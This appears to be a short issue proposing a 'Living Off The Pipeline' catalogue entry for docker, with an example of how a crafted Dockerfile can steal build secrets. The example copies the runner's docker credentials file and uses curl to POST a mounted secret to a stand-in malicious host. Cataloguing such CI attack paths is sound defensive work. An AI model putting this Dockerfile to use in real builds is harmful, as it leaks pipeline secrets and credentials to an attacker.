[LOTP] Add docker

[fproulx-boostsecurity]

Description of the LOTP tool

docker is tool to build / inspect OCI images and run containers. The build stage can be configured with Dockerfile

Configuration files

Dockerfile

Exfiltration scenario

In the case where build-time secrets are exposed to docker build, a maliciously crafted Dockerfile could allow exfiltration of the secrets

FROM ubuntu:latest

ADD /home/runner/.docker/config.json config.json
RUN ...

RUN --mount=type=secret,id=mysecret \
    sh -c 'curl -X POST -d "@/run/secrets/mysecret" http://malicious-server.example.com'